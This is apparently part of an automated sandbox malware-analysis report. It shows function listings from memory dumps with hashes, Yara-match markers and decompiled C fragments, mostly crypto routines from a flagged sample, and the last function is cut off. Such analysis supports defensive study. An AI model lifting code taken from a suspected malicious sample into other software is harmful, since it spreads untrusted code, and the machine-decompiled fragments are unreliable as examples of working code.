                                                                                                                                                    • Instruction ID: 0f4cbec2ee71f25f38cd79715fee59b19422337b8a009c25a28f6cd04913e1d8
                                                                                                                                                    • Opcode Fuzzy Hash: 40c6fc89451934213e44c858308598e88cf6aefb206a5c4c883385f03a565571
                                                                                                                                                    • Instruction Fuzzy Hash: 7A51B373E115259BE3408E19CC40259B693EBC4354F2FC679ED68DB385EA79DD12C6C0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00965485, Relevance: .2, Instructions: 172COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    • Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 97930e65db5a20d56f26551e4bf4d95fcaba0b61ea2df6da1ae5c01d45c7df90
                                                                                                                                                    • Instruction ID: 7c1e9166c0f0400b8a2a309992f6d1744d0111c301bd8b62178ee870d91b044c
                                                                                                                                                    • Opcode Fuzzy Hash: 97930e65db5a20d56f26551e4bf4d95fcaba0b61ea2df6da1ae5c01d45c7df90
                                                                                                                                                    • Instruction Fuzzy Hash: 97512876F405659BCB04CB9D8C5466CB7E6FB88312F1E81A6D99AE7361CA349C438BC0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00402D90, Relevance: .2, Instructions: 165COMMONCrypto
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 67%
                                                                                                                                                    			E00402D90(intOrPtr _a4, signed int* _a8, signed int* _a12, intOrPtr _a16) {
				signed int _t66;
				signed int* _t69;
				signed int* _t81;
				signed int _t94;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int* _t110;
				signed int _t127;
				signed int _t129;
				signed int _t133;
				signed int _t152;
				intOrPtr _t171;

				_t81 = _a12;
				_t110 = _a8;
				asm("ror esi, 0x8");
				asm("rol eax, 0x8");
				 *_t110 =  *_t81 & 0xff00ff00 |  *_t81 & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[1] = _t81[1] & 0xff00ff00 | _t81[1] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[2] = _t81[2] & 0xff00ff00 | _t81[2] & 0x00ff00ff;
				_t66 =  &(_t110[1]);
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[3] = _t81[3] & 0xff00ff00 | _t81[3] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[4] = _t81[4] & 0xff00ff00 | _t81[4] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[5] = _t81[5] & 0xff00ff00 | _t81[5] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[6] = _t81[6] & 0xff00ff00 | _t81[6] & 0x00ff00ff;
				asm("ror esi, 0x8");
				asm("rol ecx, 0x8");
				_t110[7] = _t81[7] & 0xff00ff00 | _t81[7] & 0x00ff00ff;
				if(_a16 != 0x100) {
					L4:
					return _t66 | 0xffffffff;
				} else {
					_t171 = _a4;
					_t69 = 0;
					_a12 = 0;
					while(1) {
						_t152 =  *(_t66 + 0x18);
						_t94 = ( *(_t171 + 4 + (_t152 >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(_t171 +  &(_t69[0x241])) & 0x000000ff) << 0x00000010) << 0x00000008 ^  *(_t171 + 4 + (_t152 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t171 + 5 + (_t152 >> 0x00000018 & 0x000000ff) * 4) & 0x000000ff ^  *(_t171 + 4 + (_t152 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t66 - 4);
						_t127 =  *_t66 ^ _t94;
						 *(_t66 + 0x1c) = _t94;
						_t96 =  *(_t66 + 4) ^ _t127;
						 *(_t66 + 0x20) = _t127;
						_t129 =  *(_t66 + 8) ^ _t96;
						 *(_t66 + 0x24) = _t96;
						 *(_t66 + 0x28) = _t129;
						if(_t69 == 6) {
							break;
						}
						_t106 = ( *(_t171 + 4 + (_t129 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t171 + 4 + (_t129 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t171 + 4 + (_t129 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t171 + 5 + (_t129 & 0x000000ff) * 4) & 0x000000ff ^  *(_t66 + 0xc);
						_t133 =  *(_t66 + 0x10) ^ _t106;
						 *(_t66 + 0x2c) = _t106;
						_t108 =  *(_t66 + 0x14) ^ _t133;
						 *(_t66 + 0x34) = _t108;
						_t69 =  &(_a12[0]);
						 *(_t66 + 0x30) = _t133;
						 *(_t66 + 0x38) = _t108 ^ _t152;
						_t66 = _t66 + 0x20;
						_a12 = _t69;
						if(_t69 < 7) {
							continue;
						} else {
							goto L4;
						}
						goto L6;
					}
					return 0xe;
				}
				L6:
			}
















                                                                                                                                                    0x00402d93
                                                                                                                                                    0x00402d98
                                                                                                                                                    0x00402da0
                                                                                                                                                    0x00402da9
                                                                                                                                                    0x00402db3
                                                                                                                                                    0x00402dba
                                                                                                                                                    0x00402dc3
                                                                                                                                                    0x00402dce
                                                                                                                                                    0x00402dd6
                                                                                                                                                    0x00402ddf
                                                                                                                                                    0x00402dea
                                                                                                                                                    0x00402df0
                                                                                                                                                    0x00402df5
                                                                                                                                                    0x00402dfe
                                                                                                                                                    0x00402e09
                                                                                                                                                    0x00402e11
                                                                                                                                                    0x00402e1a
                                                                                                                                                    0x00402e25
                                                                                                                                                    0x00402e2d
                                                                                                                                                    0x00402e36
                                                                                                                                                    0x00402e41
                                                                                                                                                    0x00402e49
                                                                                                                                                    0x00402e52
                                                                                                                                                    0x00402e5d
                                                                                                                                                    0x00402e65
                                                                                                                                                    0x00402e6e
                                                                                                                                                    0x00402e80
                                                                                                                                                    0x00402e83
                                                                                                                                                    0x00402f9f
                                                                                                                                                    0x00402fa4
                                                                                                                                                    0x00402e89
                                                                                                                                                    0x00402e89
                                                                                                                                                    0x00402e8c
                                                                                                                                                    0x00402e8e
                                                                                                                                                    0x00402e91
                                                                                                                                                    0x00402e91
                                                                                                                                                    0x00402ef6
                                                                                                                                                    0x00402efb
                                                                                                                                                    0x00402efd
                                                                                                                                                    0x00402f03
                                                                                                                                                    0x00402f05
                                                                                                                                                    0x00402f0b
                                                                                                                                                    0x00402f0d
                                                                                                                                                    0x00402f10
                                                                                                                                                    0x00402f16
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00402f72
                                                                                                                                                    0x00402f78
                                                                                                                                                    0x00402f7a
                                                                                                                                                    0x00402f80
                                                                                                                                                    0x00402f82
                                                                                                                                                    0x00402f87
                                                                                                                                                    0x00402f88
                                                                                                                                                    0x00402f8b
                                                                                                                                                    0x00402f8e
                                                                                                                                                    0x00402f91
                                                                                                                                                    0x00402f97
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00402f97
                                                                                                                                                    0x00402fae
                                                                                                                                                    0x00402fae
                                                                                                                                                    0x00000000

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                                                                                                                                                    • Instruction ID: 72940b2de139f4e90958e9e8763c4e4336f87cc22ae5d142da70f60c8c24c1bc
                                                                                                                                                    • Opcode Fuzzy Hash: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                                                                                                                                                    • Instruction Fuzzy Hash: AB5173B3E14A214BD3188E09CD40631B792FFD8312B5F81BEDD199B397CE74E9529A90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00934680, Relevance: .1, Instructions: 140COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    • Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: f2e4445a7f8380fba67e79e9472d2076bc79aa767a07b312e362d5d1c389473a
                                                                                                                                                    • Instruction ID: 3ab5b61772e48eda5bafd677117ee90d368a96adf0fea1cffc98d1c6d9d7fdc0
                                                                                                                                                    • Opcode Fuzzy Hash: f2e4445a7f8380fba67e79e9472d2076bc79aa767a07b312e362d5d1c389473a
                                                                                                                                                    • Instruction Fuzzy Hash: 9B4144312046659FD7289F21C8A1B7733E9EF42355F19881EE9838B691D729A801EB60
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00401030, Relevance: .1, Instructions: 108COMMONCrypto
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00401030(signed char* __eax) {
				signed char* _t37;
				unsigned int _t65;
				unsigned int _t73;
				unsigned int _t81;
				unsigned int _t88;
				signed char _t94;
				signed char _t97;
				signed char _t100;

				_t37 = __eax;
				_t65 = ((((__eax[0xc] & 0x000000ff) << 0x00000008 | __eax[0xd] & 0x000000ff) & 0x0000ffff) << 0x00000008 | __eax[0xe] & 0xff) << 0x00000007 | (__eax[0xf] & 0x000000ff) >> 0x00000001;
				_t94 = __eax[0xb];
				if((_t94 & 0x00000001) != 0) {
					_t65 = _t65 | 0x80000000;
				}
				_t37[0xc] = _t65 >> 0x18;
				_t37[0xf] = _t65;
				_t37[0xd] = _t65 >> 0x10;
				_t73 = ((((_t37[8] & 0x000000ff) << 0x00000008 | _t37[9] & 0x000000ff) & 0x0000ffff) << 0x00000008 | _t37[0xa] & 0xff) << 0x00000007 | (_t94 & 0x000000ff) >> 0x00000001;
				_t97 = _t37[7];
				_t37[0xe] = _t65 >> 8;
				if((_t97 & 0x00000001) != 0) {
					_t73 = _t73 | 0x80000000;
				}
				_t37[8] = _t73 >> 0x18;
				_t37[0xb] = _t73;
				_t37[9] = _t73 >> 0x10;
				_t81 = ((((_t37[4] & 0x000000ff) << 0x00000008 | _t37[5] & 0x000000ff) & 0x0000ffff) << 0x00000008 | _t37[6] & 0xff) << 0x00000007 | (_t97 & 0x000000ff) >> 0x00000001;
				_t100 = _t37[3];
				_t37[0xa] = _t73 >> 8;
				if((_t100 & 0x00000001) != 0) {
					_t81 = _t81 | 0x80000000;
				}
				_t37[4] = _t81 >> 0x18;
				_t37[7] = _t81;
				_t37[5] = _t81 >> 0x10;
				_t88 = (((_t37[1] & 0x000000ff) << 0x00000008 | _t37[2] & 0x000000ff) & 0x00ffffff | ( *_t37 & 0x000000ff) << 0x00000010) << 0x00000007 | (_t100 & 0x000000ff) >> 0x00000001;
				 *_t37 = _t88 >> 0x18;
				_t37[1] = _t88 >> 0x10;
				_t37[6] = _t81 >> 8;
				_t37[2] = _t88 >> 8;
				_t37[3] = _t88;
				return _t37;
			}











                                                                                                                                                    0x00401030
                                                                                                                                                    0x0040105b
                                                                                                                                                    0x0040105d
                                                                                                                                                    0x00401063
                                                                                                                                                    0x00401065
                                                                                                                                                    0x00401065
                                                                                                                                                    0x00401071
                                                                                                                                                    0x00401076
                                                                                                                                                    0x0040107c
                                                                                                                                                    0x004010ac
                                                                                                                                                    0x004010ae
                                                                                                                                                    0x004010b4
                                                                                                                                                    0x004010ba
                                                                                                                                                    0x004010bc
                                                                                                                                                    0x004010bc
                                                                                                                                                    0x004010cb
                                                                                                                                                    0x004010d0
                                                                                                                                                    0x004010d6
                                                                                                                                                    0x00401101
                                                                                                                                                    0x00401103
                                                                                                                                                    0x00401109
                                                                                                                                                    0x0040110f
                                                                                                                                                    0x00401111
                                                                                                                                                    0x00401111
                                                                                                                                                    0x00401120
                                                                                                                                                    0x00401128
                                                                                                                                                    0x0040112b
                                                                                                                                                    0x0040114f
                                                                                                                                                    0x00401156
                                                                                                                                                    0x0040115d
                                                                                                                                                    0x00401169
                                                                                                                                                    0x0040116c
                                                                                                                                                    0x0040116f
                                                                                                                                                    0x00401173

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                                                                                                                                                    • Instruction ID: 9ce4faf4bd6c29c48d5e9242fd1ccb7de96948774e055271f7c113e60250bd75
                                                                                                                                                    • Opcode Fuzzy Hash: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                                                                                                                                                    • Instruction Fuzzy Hash: 203180116596F10ED30E836D08BDA75AEC18E9720174EC2FEDADA6F2F3C0888408D3A5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 009326F8, Relevance: .0, Instructions: 44COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    • Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                                                                                                                    • Instruction ID: 255d2f1df3508891b1da3aa24b2bf372da9c970738ce58bea6260cca6cfd0b0b
                                                                                                                                                    • Opcode Fuzzy Hash: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                                                                                                                    • Instruction Fuzzy Hash: 90F0C231328159EBDB48EB189D5576A73D9FB94300F54C439ED4ACB245E635FD408A90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0041568C, Relevance: .0, Instructions: 24COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: c56b038934f141564b9a2ee2f0ce93e6e6adf8c99e9383c1a07687a1fd765a8a
                                                                                                                                                    • Instruction ID: 1b7a016ad3d48c099379f602fe6191e55f98f95c6ecacf955283adc745ae4e01
                                                                                                                                                    • Opcode Fuzzy Hash: c56b038934f141564b9a2ee2f0ce93e6e6adf8c99e9383c1a07687a1fd765a8a
                                                                                                                                                    • Instruction Fuzzy Hash: 2AD0223FA461244EE3058C486C801F4F3A0EAD722AB3071FBD908B34105423C0439598
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 009210D0, Relevance: .0, Instructions: 6COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    • Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                                                                                                                                    • Instruction ID: b97e0867cf63cce6a7bd091cca7d2f61d4937398616a74d9d7050cc2a0bd1794
                                                                                                                                                    • Opcode Fuzzy Hash: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                                                                                                                                    • Instruction Fuzzy Hash: E8B01272180540CBE3199718E906F5FB710FB90F00F00C93EA00781C50DA389D3CD446
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0091F8CC, Relevance: .0, Instructions: 6COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    • Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                                                                                                                                                    • Instruction ID: b608c8617bc096b37df9be2f0bc93e64f466faa20b7dbfb3ee59c54b4bfc8c85
                                                                                                                                                    • Opcode Fuzzy Hash: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                                                                                                                                                    • Instruction Fuzzy Hash: EBB01275100540C7F304D704D905F4AB311FBD0F04F40893AE40786591D77EAD28C697
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00920060, Relevance: .0, Instructions: 6COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    • Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                                                                                                                                    • Instruction ID: 5a023e870da9c1ddb48dfa425d4b1b106951aaa9a6b60f468992a3f00291b547
                                                                                                                                                    • Opcode Fuzzy Hash: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                                                                                                                                    • Instruction Fuzzy Hash: 5CB012B2100580C7E30D9714DD06B4B7210FB80F00F00893AA10B81861DB7C9A2CD45E
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 009201D4, Relevance: .0, Instructions: 6COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    • Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                                                                                                                                    • Instruction ID: 018f436d7687ff9142db90ebed9d2f0c0dfd000868ccafab48d689f3c6447ef1
                                                                                                                                                    • Opcode Fuzzy Hash: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                                                                                                                                    • Instruction Fuzzy Hash: B2B01272100940C7E359A714ED46B4B7210FB80F01F00C93BA01B81851DB38AA3CDD96
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0092010C, Relevance: .0, Instructions: 6COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    • Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                                                                                                                                    • Instruction ID: 6f78205b53d22ab4e8c81d7e3ead40d6172b524c4c965a7ad5e52c730ffb8076
                                                                                                                                                    • Opcode Fuzzy Hash: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                                                                                                                                    • Instruction Fuzzy Hash: B8B01273104D40C7E3099714DD16F4FB310FB90F02F00893EA00B81850DA38A92CC846
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00921148, Relevance: .0, Instructions: 6COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    • Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                                                                                                                                    • Instruction ID: 165250f8074bc0ef9cdc504fa449021ea13c8322197c03fc884fef66fc1cad38
                                                                                                                                                    • Opcode Fuzzy Hash: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                                                                                                                                    • Instruction Fuzzy Hash: 23B01272140580C7E31D9718D906B5B7610FB80F00F008D3AA04781CA1DBB89A2CE44A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00948788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                    			E00948788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
